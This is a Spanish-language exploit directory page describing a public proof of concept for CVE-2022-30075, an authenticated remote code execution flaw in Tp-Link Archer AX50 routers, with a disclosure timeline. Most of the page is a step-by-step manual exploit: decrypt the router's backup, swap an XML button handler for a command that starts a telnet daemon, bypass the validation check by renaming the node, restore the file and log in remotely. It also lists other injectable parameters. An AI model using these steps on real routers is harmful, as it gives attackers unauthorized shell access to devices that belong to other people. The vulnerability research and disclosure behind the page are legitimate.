Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-30075 — Tp-Link Archer AX50 RCE Autenticado (CVE-2022-30075) | Kitploit
Herramientas/GitHubGitHub/aaronsvk/cve-2022-30075
Seguridad de Sistemas EmbebidosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad de Hardware
GitHubaaronsvk/cve-2022-30075

CVE-2022-30075

Tp-Link Archer AX50 RCE Autenticado (CVE-2022-30075)

Ver Repositorio
235434hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-30075

Ejecución remota de código autenticada en routers Tp-Link

Dispositivos afectados

Si tu router Tp-Link tiene funcionalidad de copia de seguridad y restauración y el firmware es anterior a junio de 2022, probablemente sea vulnerable.

Probado con

Tp-Link Archer AX50, otros routers Tp-Link pueden usar un formato diferente de copias de seguridad y el exploit debe modificarse.

PoC

Uso del exploit para iniciar el daemon telnet en el router tplink

Explotación manual

  1. inicia sesión en la interfaz web del router
  2. ve a avanzado -> sistema -> configuración de copia de seguridad
  3. descifra y descomprime el archivo de copia de seguridad
  • si tu router usa un formato diferente de archivos de copia de seguridad, puedes modificar el código del exploit (clase BackupParser) o simplemente usar alguna herramienta de github: https://github.com/stdnoerr/tp_link_credentials_harvester/blob/master/decrypt.py https://github.com/ret5et/tplink_backup_decrypt_2022.bin ...
  1. en el archivo xml descifrado puedes encontrar algo como esto:
root@kitploit:~
<button name="led_switch">
  <action>pressed</action>
  <button>ledswitch</button>
  <handler>/lib/led_switch</handler>
</button>
  • reemplázalo con estas líneas
root@kitploit:~
<button name="exploit">
  <action>pressed</action>
  <button>ledswitch</button>
  <handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
  • hay una restricción que bloquea la modificación del parámetro system.button.handler, pero se puede omitir fácilmente cambiando el nombre del nodo xml padre (p. ej. name="exploit")
  • la ejecución de código no solo se puede lograr cambiando el parámetro system.button.handler, sino también usando ddns.service.ip_script, firewall.include.path, uhttpd.main, y otros...
  1. comprime y cifra el archivo de copia de seguridad modificado
  2. ve a avanzado -> sistema -> configuración de restauración -> sube el archivo de copia de seguridad modificado
  3. después de reiniciar, pulsa el botón led que activa la ejecución del comando inyectado /usr/sbin/telnetd -l /bin/login.sh
  4. inicia sesión remotamente en el router: telnet 192.168.1.1

Cronología

15.03.2022 - Vulnerabilidad identificada 15.03.2022 - Se contactó con el soporte de Tp-Link 16.03.2022 - Se recibió respuesta de Tp-Link 02.05.2022 - Se asignó CVE 27.05.2022 - Tp-Link publicó firmware con la vulnerabilidad corregida 07.06.2022 - Se publicaron los detalles técnicos

Descargar herramienta